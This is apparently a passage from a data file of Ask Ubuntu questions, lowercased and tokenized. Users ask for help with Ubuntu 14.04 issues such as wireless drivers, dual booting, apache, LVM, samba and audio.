path=/mediaendpoint/a2dpsource apr 30 16:38:58 cho bluetoothd [ 571 ] : endpoint unregistered : sender=:1.38 path=/mediaendpoint/a2dpsink apr 30 16:39:02 cho sudo : pam_ecryptfs : pam_sm_authenticate : /home/xxxxx is already mounted cat ~/.xsession-errors login lagging script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . cat ~/.xsession-errors login good script for ibus started at run_im . script for auto started at run_im . script for default started at run_im .
458348	difference between 64-bit ( native ) and amd64-mac architecture	well is there any actual difference between 64-bit ( native ) and amd64-mac versions of ubuntu when they are being used under a no-mac computer ... ? ? ? as far as i am using a amd-piledriver processor ( fx-8350 ) will i am going to have any performance increase if i install the amd64 version ? futhermore , i would like to inform you that i know that amd64 is the typical x86-64 because advanced micro devices made the first 64-bit cpu , but is there anything small different nowdays between intel64 and amd64 and which each version of ubuntu offer ? ?
458352	google hangoust stick to the wrong display ( monitor ) in ubuntu 14.04	i have multiple displays ( dual-monitor configuration ) . after a fresh install of ubuntu 14.04 and installing google chrome + google hangouts extension , all hangouts windows are opened on display that i do not use a lot . is there any way to set hangouts to open in correct window ? ( dragging it to another window every time is very annoying ) .
458355	trouble installing wireless drivers	i installed ubuntu 14.04 on my 64bit lenovo t430u . i did not get the wireless drivers installed by default . so i am using an ethernet cable to install the drivers by following this and i am running into the following problems - here is what i get for 1st command - yash @ yash : /usr/lib/x86_64-linux-gnu $ lspci -vvnn |grep 14e4 error : ld.so : object 'error : ld.so : object '/root/libc-2.17.so/root/libc-2.17.so ' from ' from ld_preloadld_preload can not be preloaded ( can not be preloaded ( can not open shared object filecannot open shared object file ) : ignored . ) : ignored . error : ld.so : object 'error : ld.so : object '/root/libdl-2.17.so/root/libdl-2.17.so ' from ' from ld_preloadld_preload can not be preloaded ( can not be preloaded ( can not open shared object filecannot open shared object file ) : ignored . ) : ignored . error : ld.so : object 'error : ld.so : object '/root/libm-2.17.so/root/libm-2.17.so ' from ' from ld_preloadld_preload can not be preloaded ( can not be preloaded ( can not open shared object filecannot open shared object file ) : ignored . ) : ignored . error : ld.so : object 'error : ld.so : object '/root/libpthread-2.17.so/root/libpthread-2.17.so ' from ' from ld_preloadld_preload can not be preloaded ( can not be preloaded ( can not open shared object filecannot open shared object file ) : ignored . ) : ignored . error : ld.so : object 'error : ld.so : object '/root/librt-2.17.so/root/librt-2.17.so ' from ' from ld_preloadld_preload can not be preloaded ( can not be preloaded ( can not open shared object filecannot open shared object file ) : ignored . ) : ignored . 03:00.0 network controller [ 0280 ] : broadcom corporation bcm43228 802.11a/b/g/n [ 14e4:4359 ] subsystem : broadcom corporation device [ 14e4:0607 ] after i type sudo apt-get update a bunch of things get installed without any errors . then i type in yash @ yash : /usr/lib/x86_64-linux-gnu $ sudo apt-get install bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : bcmwl-kernel-source : depends : dkms but it is not going to be installed libc6 : breaks : libc6 : i386 ( ! = 2.19-0ubuntu6 ) but 2.15-0ubuntu10.5 is to be installed libc6 : i386 : depends : libc-bin : i386 ( = 2.15-0ubuntu10.5 ) breaks : libc6 ( ! = 2.15-0ubuntu10.5 ) but 2.19-0ubuntu6 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and then finally this - yash @ yash : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libc6 : i386 suggested packages : glibc-doc : i386 locales : i386 the following packages will be upgraded : libc6 : i386 1 upgraded , 0 newly installed , 0 to remove and 25 not upgraded . 5 not fully installed or removed . need to get 0 b/4,017 kb of archives . after this operation , 127 kb of additional disk space will be used . do you want to continue ? [ y/n ] y preconfiguring packages ... ( reading database ... 163521 files and directories currently installed . ) preparing to unpack ... /libc6_2.19-0ubuntu6_i386.deb ... checking for services that may need to be restarted ... checking init scripts ... checking for services that may need to be restarted ... checking init scripts ... stopping some services possibly affected by the upgrade ( will be restarted later ) : cron : stopping ... done . unpacking libc6 : i386 ( 2.19-0ubuntu6 ) over ( 2.15-0ubuntu10.5 ) ... dpkg : error processing archive /var/cache/apt/archives/libc6_2.19-0ubuntu6_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libc6/readme.debian.gz ' , which is different from other instances of package libc6 : i386 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libc6_2.19-0ubuntu6_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) yash @ yash : ~ $ note - earlier i was at some different location ( not home ) . then i switched to my root directory and tried the same thing and got the same errors .
458359	[ drm : intel_dp_start_link_train ] , too many voltage retries , give up	upon startup in ubuntu 14.04 on my asus ux32vd laptop , i get the following error : `` [ drm : intel_dp_start_link_train ] , too many voltage retries , give up '' the computer boots fine otherwise , but i do n't know what the issue is . thanks !
458362	conflict management during file operations	when you copy files from a to b and there are conflicts , you have to wait until the conflict arises before you can make a decision on it ( merge , replace , etc. ) . if you 're copying several gb 's or even tb 's of data this can mean a huge wait time before you ever see a file conflict pop up ( think 3 hours into 8 hour transfer ) , at that point you can select merge - > do this for all conflicts of this type . when i do a massive transfer i would like to set it and forget it . as it is , you need to constantly check in on progress . as soon as i begin copying i would like to see a list of conflict types where i can select what i want to do . i.e . file transfer begins , i select merge all folders , skip all files . is there a way to get this to happen ? if not how can i submit this suggestion to ubuntu developers ?
458363	/boot on software raid 10	i am installing 14.04 lts on a dell server with 4 sas disks . i want to configure the disks as raid 10 but i am wondering about the swap and boot partitions - should these be on the raid 10 partitions or moved onto raid 1 ? i have read reports that boot could not be put on raid 10 but this does not seem to be a problem with 14.04 any recommendations ? thanks . howard .
458366	coolsense for hp envy dv4-5266la on ubuntu 14.04	i recently installed ubuntu 14.04 on my hp envy dv4-5266la laptop . i have a problem because my computer is too hot , and the battery drains very fast . please help to solve this problem that may be affecting my battery .
458369	`` failed to download repository information ''	i ca n't update for some reasons.. this is what i get each time : w : failed to fetch http : //repo.steampowered.com/steam/dists/precise/steam/i18n/translation-en error reading from server . remote end closed connection [ ip : 23.15.8.226 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . i 'd appreciate any help .
458372	nmap remote server	how do i scan through an external servers ip range to get hold of all the machines , for basic hostname and ip information from my own local machine ? we have all access to the external servers as it 's our hosting isp . i ca n't do it from the machine itself with an ssh session , because we do n't want to have any packages installed on those servers .
458376	network menu missing in menu bar in 14.04	after upgrading from 13.10 to 14.04 lts , the network menu in my global menu bar has disappeared . i have n't been able to find any documentation outlining how to debug system menu items . how do i get this menu item back ? another issue that may be a symptom of the same problem is that the `` options '' button under the wired networking preferences pane no longer does anything . i 've checked that indicator-network is installed .
458379	recognize installed application	i 've a problem to make ubuntu 13.10 to recognize my installed program . i 've installed blender 3d from the site instead of usc and i 've created the .desktop file . all run good but when i tried to open a .blend file the system tell me that there is n't appropriate program installed and also the dock bar i 've installed ca n't make an icon of blender but only of the program that i 've installed from usc . thanks in advance for the reply .
458380	how do i write a preseed file to exactly reproduce a default server build ?	i 'm trying to provision a batch of virtual servers . they are 100 % nothing special - i go through the default install selecting english/uk , primary network eth0 , hostname , default user , regular entire-disk partitioning , and only add openssh-server . but when i try to set up a preseed file to do this ( https : //gist.github.com/pfmoore/2a34b3396a95d767205c ) and a boot command line of /install/vmlinuz url=http : //example.com/basic.cfg locale=en_gb \ keymap=gb interface=eth0 hostname=xxx \ debconf/frontend=noninteractive debian-installer/keymap=gb \ initrd=/install/initrd.gz quiet -- it 's never quite the same . the hostname is `` localhost '' even though i set it on the boot command line . when i log in , i do n't get the landscape `` system information '' banner . the output of dpkg -l is 45 packages shorter ( there 's some basic stuff like vim , curl , tmux missing ) ... i 'm aware that i can do debconf-get-selections -- installer to query the `` right '' values , but that does n't give me something maintainable ( or even readable , tbh ... ) . i 've searched the web and found lots of advice on how to set up unusual configurations , but i have n't been able to find anything that explains how to set up the basic , out-of-the-box default configuration . so - how do i set up an unattended default installation ? ( i 'm happy to ignore any non-default selections in the above just to get a starting point , although advice on how to include those would also be welcome ) .
458382	can not login through firefox in askubuntu	when i try to login to askubuntu through the latest ( 29.0 ) firefox , it wo n't let me . i press the login button , and without pressing `` login with google '' or anything else , i see a popup saying : '' welcome back hakermania , you 've been logged in . you are being redirected ... '' but then it just redirects me to the main askubuntu page and it does not show me logged in . this appears to happen only in askubuntu . other stackexchange sites like stackoverflow seem to work pretty well .
458389	are optimus notebooks working properly on ubuntu 14.04 ?	i 'm a long term debian/ubuntu user , but recently i aquired an optimus notebook ( which has 2 video cards : an intel integrated video card + a nvidia dedicated video card ) and i find out that it simply wo n't work properly on debian jessie and ubuntu 13.10 , even with bumblebee . i finally got it working on opensuse 13.1 + bumblebee , i can play any game i want directly from steam - which is kind of a dream comming true lol . but i like .deb distros : / what about the recently launched ubuntu 14.04 ? do optimus notebooks work properly now ? could someone who have an optimus notebook tell your experience using it to play games in this new ubuntu release ? does bumblebee or nvidia-prime work properly ?
458392	make diodon use the faenza-darkest icon in the top panel	the diodon icon in my panel has a yellow colored fish that does not go well with the other icons . i have tried to follow this post to change the icon : how can i change which icon an applet uses ? ... but it only changes the icon in the launcher , not in the panel . how can i make diodon use this icon from faenza-darkest ? /usr/share/icons/faenza-darkest/actions/22/gtk-paste.png my panel looks like this : as you can see , while the fish is cool , it does not go well with the other icons . i do get a different icon if i change to ubuntu-mono-dark , but as i prefer faenza darkest this is not an option for me .
458396	open multiple luks partitions at boot	i have a setup where i have 4 luks partitions that need to be mounted at boot time in order to assemble a raid10 btrfs partition holding the root partition of my system . i was able to finalize the setup fine , but when i try to boot into the system it just does n't work . i started mucking around i have noticed that it seems that the crypto hook for initramfs only will setup one partition from crypttabat boot time , this information is inserted into the cryptoroot configuration within the initramfs image . i was able to make the system boot by adding a hacky script into initramfs that will execute before everything else that will open the other luks partitions . is there a way to achieve what i want with the standard infrastructure ? i will i have to start maintaining my own initramfs script in order to achieve what i want ?
458398	useradd username doesnt create '/home/username '	i entered useradd test1 passwd test1 entered password but did n't create separate /home/test1 instead used mine . why ? it is so because i gave /home paritition separately ?
458399	clarifications about gstreamer	i 'm a bit confused about what gstreamer does . does it come installed by default with ubuntu ? if so which version is the default for 14.04 ? does it provide hardware accelerated video playback ( decoding ) ? if so does it work with va-api and vdpau or is it an alternative to those ? thanks for your help
458400	ldap client causes boot to be very slow on 13.10 , causes hang on 14.04	i have successfully configured ubuntu as an ldap client following the howtos found on this site . i do the following . 1 ) apt-get install libpam-ldap nscd 2 ) configure ldap-auth-config 3 ) change /etc/nsswitch.conf passwd : ldap compat group : ldap compat shadow : ldap compat 4 ) add the line session required pam_mkhomedir.so skel=/etc/skel umask=0022 to /etc/pam.d common-session 5 ) do a /etc/init.d/nscd restart 6 ) change lightdm.conf to allow user login with name and password everything works fine . users can login and all works as expected . the problem i have is : on startup ( cold start , reboot ) ubuntu takes about 6 minutes to boot on 13.10. on 14.04 it hangs completely . as soon as i deactivate ldap ( e.g renaming ldap.conf , or entering a wrong ldap uri ) boot runs normal and takes about 20 seconds . any ideas ?
458402	address book icon . save contents	is there any way of saving my address/contact book in ubuntu 13.10 as i want to do a clean install of 14.04lts this is not my email . it is the address book with the brown `` book '' icon on the launcher at the left of the screen . ( brown cover/book with @ in black . thanks
458406	how to turn on the fourth screen	if i am have 3 same monitors ( 1680x1050 ) and i am frequently using eyefinity ( 3 monitors- > 5040 x 1050 ) and i wan na show something to the family on our brand new big screen tv , then why i am can not ? my vga card is support 5 ( ! ) monitors in same time . the system is not see the fourth one . if i am plug the tv only , the system see it . but does n't work with the other three . i recorded the issue in a video
458407	ubuntu 14 flash confirmation not clickable in uniti3d	i install today ub.14 and have a problem in flash media policy ! if i have a flash based media device acces - eg.webinar app- the flash access/denied confirmation dialog and setting is not clickable ! this problem one old unity bug ! the oldest ubuntu version resolve temporary this , change unity2d , clicking work fine . problem is live in unity3d curremntly now . howto resolve this , the ubuntu 14 is deprecated unity2d ! i use flash global settings ( temporary resolve the domain policy enabling , do n't access the setting elements ) , this a wrong model , require correct clicking and navigating in the flash panel !
458413	how to fix dual-booting windows 8 and ubuntu 14.04 on a sony vaio ?	i am currently trying to install ubuntu 14.04 on a sony vaio that came pre-installed with windows 8 in ( i understand ) uefi mode . and i am experiencing the dual-boot hell . i already tried most of the suggestions in the exhaustive installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) guide as well as ubuntu installations when using uefi , but i still experience issues so please do not mark the current question as duplicate . these are the steps that i already did : use a 64-bit 14.04 in the bios i could not find nor disable quickboot/fastboot and intel smart response technology ( srt ) . but i did disable faststartup in windows 8 . in bios i disabled secureboot . i installed 14.04 in uefi mode ( the /etc/fstab contains the uefi partition ) by using manual partitioning on the gpt hard-drive . i reduced the size of the windows 8 partition from within windows 8 , as recommended . after the installation i noticed dual-booting issues , so attempted to use boot-repair ( following this guide ) . but it only ended in an error and did n't fix much . issue : windows 8 always boots fine . when somehow i manage to get to the grub screen then choosing ubuntu or windows 8 will result in either os booting just fine . so dual-booting sort of works . however , most of the times the vaio will simply boot to windows 8 after a shutdown or restart . to get to the grub screen reliably , i am currently using the following awkward workaround : while holding the shift key , i click on restart within windows-8 : when the menu below appears , i select use a device : then i select ubuntu : afterwards the grub menu appears and i can boot ubuntu . for this to work i had to enable external device boot in bios and set in the boot priority that the external device ( 1 ) should be before the internal hdd ( 2 ) . question : how can i fix the dual-boot issues on the laptop ? i would like to be able to get straight to the grub screen whenever i restart the computer , either from windows 8 or from ubuntu .
458415	can not activate apache ssl ( https configuration )	i 've newly installed my private web server with ubuntu 14.04 and i installed already apache 2.4.7 . when i open via firefox http : //xxx.xxx.xxx.xxx ( my ip adress ) i see the `` apache2 ubuntu default page '' which indicates that apache works . so far so good . i want to use ssl so i want configure apache for that . i followed the documentation ( chapter `` https configuration '' ) . https : //help.ubuntu.com/14.04/serverguide/httpd.html # https-configuration there are 3 commands i have to run in terminal and i did so . if i understand the documentation right this should work without creating own certificate . so to test i open again firefox https : //xxx.xxx.xxx.xxx to check if it works . but the page seems to hang and it does n't seem to work . questions : what is wrong ? do i have to create a certificate before i can use the default-ssl site ? thank you in advance !
458417	apache2 not starting after purge and re-install	first of all - i have looked and tried several approaches including apache server not starting i am using ubuntu 14.04 64 bit i had purged using an answer at serverfault sudo service apache2 stop sudo apt-get -- purge remove apache2 sudo apt-get remove apache2-common sudo apt-get autoremove whereis apache2 ( gave 3 locations ) sudo rm -rf /etc/apache2 sudo rm -rf /usr/sbin/apache2 sudo rm -rf /usr/lib/apache2 i did sudo apt-get -y install apache2 - says it is the newest version all conf files are in /etc/apache2 /etc/log/apache2/error_log is blank sudo service apache2 restart gives no output - no error - no message http//localhost or 127.0.0.1 say web server not available ps ax | grep -i apache gives 7919 pts/0 s+ 0:00 grep -- color=auto -i apache i am stumped - please help ! edit - just realized /usr/sbin/apache2 does not exist and neither does /usr/lib/apache2 after 3 re-installs - how do i get them - pleas help - thx
458421	how do you convert a dmg file to img in ubuntu ?	i have installed dmg2img-1.6.2 on my virtual computer . when i say installed i mean i can see the folder dmg2img-1.6.2 and contents in my home directory . i am using linux 12.04 . i have been trying for a week now to convert a dmg file to img using terminal . the response to `` dmg2img lightroom_5_ls11.dmg '' is syntax error . other commands usually respond as `` can not open input file lightroom _5_ls11.dmg . any help would be appreciated . not sure which set of commands to use . just been using trial and error method , none of which has worked .
458426	problem on install wireshark	i have installed kubuntu . now i am trying to install wireshark but it shows this message . if anyone know the solution please post it . the following packages have unmet dependencies : wireshark : depends : libportaudio2 ( > = 19+svn20101113 ) but it is not installable depends : libwireshark3 ( > = 1.10.0 ) but it is not going to be installed depends : wireshark-common ( = 1.10.6-1ubuntu2~ppa2~s ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
458427	who reads `/etc/default/keyboard` ?	and i do not care about the console here ( i care about x11 ) ... i see in /var/log/xorg.0.log that my x-server picks up xkb_rules evdev from somewhere i can’t find . it also seems to take xkb_model and xkb_layout from the config file /etc/default/keyboard . and i’m asking myself , is that hardcoded in x or the evdev driver ? ? the man-pages don’t mention that file , as usual ... : - ( so , where is the code that connects that file to x ?
458430	progress bar while using apt	i have downloaded the install-progress.cc file which is the same as this . i have tried following these and even these instructions to enable the progress bar in the terminal , but even if i run apt processes i do n't get the progress bar . what am i doing wrong ? can someone please help me ?
458434	what protocol should i use to wirelessly connect to a cannon pixma mx860 ?	i ca n't seem to get my cannon pixma mx860 to print over wifi . i 've tried : adding it via the add a new printer dialogue , but only my network laser scanner is found . going to canon 's website for drivers , but there are none ; it says to use the ones within my distribution . installing drivers via ppa , as mentioned here but the michael-gruz/canon repository has no files for saucy . manually filling in the uri https information , but am unsure if i need to append port numbers and directory locations the printer adds okay , and a test page seems to be sent out , but the printer screen goes black and nothing is printed ( similar to this problem ) manually adding the bjnp driver and entering it as a manual uri as specified here , but have the same unknowns ( port ? , subdirectory ( s ) ? ) that i did with html uri addition and auto detect still does not work what uri formats are vailid for a canon pixma mx860 ? also of note : when i print via usb , it tends to mess up the first line of the first page printed on a separate page . relaed : wirelessly connect canon pixma mg3222 printer how can i configure a canon pixma mg5300 to print wirelessly ? how can i install a canon printer mp190 driver ? added wireless printer for canon mg8150 no print is produced how to install canon mp610 printer on ubuntu 12.04 x64
458435	ubuntu 14.04 installation	i 'm new ubuntu user.i 've installed ubuntu 14.04 lts in my hp pavilion 14-e037tx notebook alongside with windows 7 from usb stick but my ubuntu desktop is not opening . when i 'm trying it ( try ubuntu ) before installation it shows the same message . it 's `` your computer is running in low graphics mode '' . what can i do ?
458436	ubuntu14.04 sound not working without headphones	i have installed ubuntu 14.04 in my lenovo s210 laptop , but when i am trying to make audio/ video calls with ubuntu 14.04 , my microphone is not working . but when i make calls by connecting headset , it works good . can anyone have the solution for this problem , please help me .
458438	why are sound notifications switching back to default audio device ?	i have setup thunderbird to play a sound whenever a new message arrives , and until a few days ago it was n't working until i installed libcanberra-gstreamer . only after a day or two it has stopped working and i can only assume that some settings in ubuntu/kubuntu have switched back to what they were previously . playing the test sounds directly in thunderbird has also stopped working . is there some way to test if thunderbird is using the right subsystem to play the sounds and if some other sound playback system has supplanted the libcanberra-gstreamer system ? right now whenever there is a sound notification a message popups saying that the system switched to the default audio device , which is an onboard device that is not working . is there some setting in the multimedia notification system that forces a switch to the onboard/default system ?
458442	merge multiple jpegs into one video	i am capturing images from a web came in 1 second intervals . i would like to find a way to create a video of these images . since the camera is still and there can be long periods of time when the picture will not change , i 'd like to be able to discard what are essentially duplicate images to be able to shorten my resulting video .
458443	problem with sharing wireless internet connection over adhoc on ubuntu 14.04	i 'm new to ubuntu and i have problem with sharing my router wireless internet connection over adhoc on my ubuntu 14.04 . i am able to do that in windows ( windows have software for that ) but here as i know there is no software to do that . is there somebody that have or know how to write some code to do that ?
458454	how to make gamma settings on ubuntu 14.04 permanent ?	i need to change my monitor 's gamma settings permanently to the value of 0.7 . i 've tried using xgamma for this , but the thing is i have to execute this command everytime i start my laptop . also , the gamma settings seem to revert to their original values ( 1.0 ) if something significant happens - when i copy/delete something , when i play media from my external hard disk , etc . i tried making a custom script which reads like : # ! /bin/bash xgamma -gamma 0.7 saved it as gammasettings.sh , put it up into my list of start-up applications ; but it fails to work for some reason . changing these settings again and again is a really cumbersome . is there a way to make these changes permanent ( edit any .conf file or something ) ?
458460	wacom tablet middle mouse button scrolling	so i recently got a wacom bamboo pen graphics tablet , which is wonderful . i 've been trying it out as a general purpose mouse on my 14.04 laptop . the only annoyance is scrolling . the tablet has no scroll wheel nor scroll buttons , and moving to the scroll bar on the screen is really very annoying . i remember using windows you could click the middle mouse button to `` autoscroll '' , which would be amazing with a tablet -- -it 's exactly the sort of solution i want . i ca n't however , for the life of me work out how to implement this system-wide on ubuntu . i am aware that there are chrome and firefox extensions/options for enabling this for those browsers , but i would love something system wide . i understand that middle-click is `` supposed to be '' copy/paste on linux , but when i have ctrl+c/v i really do n't need another clipboard , what i need is easy scrolling . any other solutions for simple scrolling with a graphics tablet would be much appreciated too . a keyboard shortcut perhaps ?
458462	file access control mechanism in ubuntu 13.10	can someone tell me where i can find detailed description about file access control mechanism used in ubuntu 13.10 desktop . i already tried ubuntu documentation , thank you .
458466	which pdf reader support zoom or triming margins in presentation mode ?	i like to read pdf files in presentation mode . but most of the times its not easy to read text in full screen as text size gets smaller . is there exist any pdf reader that can give me zooming or trim margins in presentation mode . in normal mode many pdf readers give facility of zoom and trim margins but that does not work in presentation mode .
458472	a command in kubuntu is not working	kubuntu 14.04 $ kdesudo anyfile.tx $ kate anyfile.tx works fine it just dose not work returns the $ sign as if i typed nothing .
458476	adding disks with lvm	i 'm sure this has been answered somewhere on here before ( i even found kinda a guide here , but seemed to be a bit spotty and incomplete ) but i was wondering if someone could assist me or at least point me in the right direction to get what i 'm trying done accomplished . basically i installed ubuntu 14.04 ( via `` guided - use the entire disk and setup lvm '' ) on a 20gb disk . i then physically added a clean 80gb disk to the machine , which it detects as 'sdb ' . basically my question is , i want to be able to add/combine the allocated amount of space from the new disk ( 80gb ) to my machine so that instead of showing two drives ( 20gb and 80gb ) , it simply shows one drive ( 100gb ) . i 'm not worried about raid or any other special add-ons . i 'm somewhat new to linux , but understand that i need to use lvm to accomplish this . if there is anyone who can help me out or link me to a helpful guide/tutorial , it would be very much appreciated ! not sure if this is needed either , but here is my 'fdisk -l ' and '/etc/fstab ' output : fdisk output ( shortened ) : disk /dev/sda : 21.5 gb , 21474836480 bytes device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 41940991 20719617 5 extended /dev/sda5 501760 41940991 20719616 8e linux lvm disk /dev/sdb : 85.9 gb , 85899345920 bytes disk /dev/sdb does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-root : 20.4 gb , 20392706048 bytes disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 801 mb , 801112064 bytes disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table /etc/fstab ( shortened ) : # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=26710773-7a64-4f34-a34e-0057cb1739d7 /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0
458478	what is sudo -i	what does this command ? sudo -i ? i 'm not sure if i should have made a post with just this question , but since i 'm a linux newbie and i have a lot more questions and doubts , i decided to go ahead and ask . that should n't hurt i guess . and many thanks in advance for the help : )
458480	why do cdimage.ubuntu.com and releases.ubuntu.com list different images ?	there are two places i go when i want to download ubuntu installer images : cdimage.ubuntu.com and releases.ubuntu.com . both of these appear equally official : they are both subdomains of ubuntu.com , and the main ubuntu website makes references to both for its download links . ( http : //www.ubuntu.com/download/alternative-downloads uses the former for its 'network installer ' download links , and the latter for its 'bittorrent ' download links , for example . ) if i visit http : //releases.ubuntu.com/ and follow links for the current ubuntu release , i reach a page that lists numerous links to desktop and server installer images . likewise , if i visit http : //cdimage.ubuntu.com/ and follow links in a similar manner , i get to another very similar page that also gives numerous links to desktop and server installer images . at the moment , these pages are : http : //releases.ubuntu.com/trusty/ http : //cdimage.ubuntu.com/releases/trusty/release/ ( following '14.04 ' links instead of 'trusty ' leads to pages identical to the above , aside from their urls . ) the language used on those two pages suggests that each page lists all of the available image files . for example , they each say `` a full list of available files , including bittorrent files , can be found below '' , and they each provide a wide variety of link types ( .iso , .torrent , .metalink etc ) . neither page makes any reference to the other page 's existence , and for a long time i thought that these were simply two different urls serving essentially the same list of installer images . right ? now that i look more closely i see that , despite appearances , the actual lists of files are almost entirely different . for the trusty release , releases serves i386 and amd64 images , whilst the cdimage site serves powerpc and mac-friendly images . even going back to the precise release , when the architectures overlapped more , there are still installer images on each page that are not available from the other . i 've searched for explanations as to why the two sites are so disjoint , but have so far found none . i assume that releases.ubuntu.com is intended to hold the more common installer images , whilst cdimage.ubuntu.com is intended to be a more comprehensive archive , given that it also hosts installers for the various spins such as lubuntu , xubuntu , etc . however , this still does n't explain some things : why is there no single page i can go to and see all available images ? for example , if releases.ubuntu.com is reserved for the more popular images , why are these not also included in the ( more comprehensive ) list at cdimage.ubuntu.com ? if there 's a good reason for keeping them separate , then why does neither page acknowledge the other as a complementary source of installer images ? is there any historical reason for this split ? if anyone has any behind-the-scenes insight into this , i 'd be interested to hear how things ended up this way .
458481	install maas before i install maas ?	maybe i 'm not understanding how the setup exactly works , but every guide i find on how to initially set up maas ( in order to use juju and ubuntu to create a cloud environment ) there is a step for me to add an ubuntu maas api address . how would i already have a maas api address if this is my first time setting up anything with maas ? it 's obvious to me that i 'm not understanding something about the configuration . can anyone clear this up for me ? also , i feel like i understand the basics of how maas and juju work together , so please do n't just link to https : //help.ubuntu.com/community/ubuntucloudinfrastructure , because i 've read that pretty thoroughly . i just need to know what this whole mass api is about for a first time installer who 's never setup anything related to maas before . thanks ,
458486	samba.cnf security = parameter is missing	the security = parameter is missing in the samba smb.conf file in ubuntu 14.04 . i wanted to set it to security = share . i tried to just put it in the authentication section where it used to be in earlier versions of ubuntu but this does not work . does anyone know what happened to this parameter in ubuntu 14.04 ? i suppose i could just use security = user , but my android app works better without username and passwords .
458489	how do i allow gdevilspie to close/minimize an app only at startup , but allow it open at other times ?	i am trying to use gdevilspie to close an autostart application that is configured to remain running but be closed to the notification tray . unfortunately , this works , but for obvious reasons , does n't allow me to actually ever bring the application into focus to use it . here 's the raw code it 's running . is there a way to change this so that it only closes ( or minimizes ) upon startup ? ( if ( begin ( is ( window_name ) `` nixnote - default account '' ) ) ( begin ( close ) ( println `` match '' ) ) )
458494	unable to burn ubuntu to dvd	i downloaded ubuntu 14.04 on my computer and when i click on this pc - > downloads , the file is listed as a winrar zip file as ubuntu-14.04-desktop-amd64.iso . however , when i click on this file , i get this error message : c : \users\windows 8\downloads\ubuntu-14.04-desktop-amd64.iso . the archive is either in unknown format or damaged . i am running windows 8.1 update but am not very computer literate . can someone please advise me exactly what i should do to install the operating system on a second 500 gb hard that i have installed internally in my computer so that whenever i want to use ubuntu , all i have to do is to disconnect my primary drive with windows 8.1 and then connect the cables to the second hard drive . that way , i suppose ubuntu will boot . when i right click on the downloaded file and then choose open with , i do not see the option windows disc image burner . the only options are windows explorer , winrar archiver and choose default program . but when i choose this option , the only other options are adobe reader , internet explorer , microsoft office etc . how then do i install ubuntu ? i would appreciate all responses .
458496	14.04 compiz button press lost	i use buttons 6 and 7 ( mouse wheel pushed sideways ) to rotate the compiz cube . that worked find until yesterday when i upgraded to 14.04 . after the upgrade the button presses worked correctly if the mouse was hovering over the desktop but were lost if the mouse was over any window . i 've had a good look around but could n't find a bug that matched this behavior . my current solution uses xbindkeys and xdotool - it 's a horrible hack : # move left '' xdotool key ctrl+alt+left '' b:6 # move right '' xdotool key ctrl+alt+right '' b:7 basically kicking off the keyboard shortcuts to change desktop using a script activated by the mouse . apart from being a horrible hack it also slows down the rate i can change desktop . i tried using ccsm 's `` commands '' tool to map to the xdotool commands but it obviously had exactly the same problem that it only worked with the mouse over the desktop . what 's going on with compiz is this a manifestation of a know bug ?
458497	how do you find out where lubuntu applications are after installation ? ( grive specifically )	i 'm very , very new to linux / lubuntu i have successfully installed several programs and found them in obvious locations . that said , i 'm trying to install grive , and since i 'm using lubuntu , i do n't have the ubuntu search feature to find grive setup that the installation instructions refer to . i can not seem to locate the appropriate setup file to move forward . i 'd love some help with this specific issue and also general comments on how to identify where installed programs go .
458498	clean installed ubuntu 14.04 . ran into some authentication problems	this was a clean install . i wiped everything even my windows partition . hp 2000 notebook , e2 vision hd amd/ati processor using the proprietary driver and fully up to date . 1 ) using software updater , it did n't ask me for a password , went unresponsive for a moment , then just went on to start downloading and installing updates . ( prior to installing any updates- right after install- using a live usb made on the day 14.04 was released . ) 2 ) ( fully up to date ) did n't wake up from sleep , just stayed a black screen and forced me to power it off manually via the power button . anything i need to fix or be aware off ? 3 ) also , the grub menu does n't come up prior to booting ubuntu , only a pink/purple outline on the edges of my display . anything i need to fix or be aware off ?
458499	eclipse is always starting with /root/workspace	eclipse is always starting with /root/workspace . i select ~/workspace and check that i want to use this workspace only . but on every restart eclipse is trying to open with /root/workspace . i have also checked the corresponding switches within eclipse , but nothing helps : always starts again with /root/workspace . i am running eclipse kepler with ubuntu 14.04 in a virtualbox 4.3.10 .
458503	audio unmutes when coming out of suspend in ubuntu 14.04 ?	since upgrading to ubuntu 14.04 , whenever i wake my laptop out of suspend , its previous volume settings are forgotten and the volume is unmuted and set to 100 % . obviously , this is annoying if i open my laptop in a public space . this also occurs whenever i turn my laptop on ( i.e . it does n't remember that i turned it off with its volume controls muted ) . what should i modify so that my laptop remembers its pre-suspend volume settings ? edit : i 'm running ubuntu 14.04 trusty tahr on a dell inspiron n5110 .
458510	audio problems with skype under 14.04 , that did not exist under 12.04 lts	i 've installed skype under ubuntu 12.04 lts directly from the skype website and never had any problems . since i upgraded to 14.04 the audio capture does not work any longer . i followed the answers already out there on the forum , purged skype and installed it several times again , folowing the various ways recommended . i also installed libpulse0 : i386 , it did n't make a difference . can somebody help me ? thank you so much .
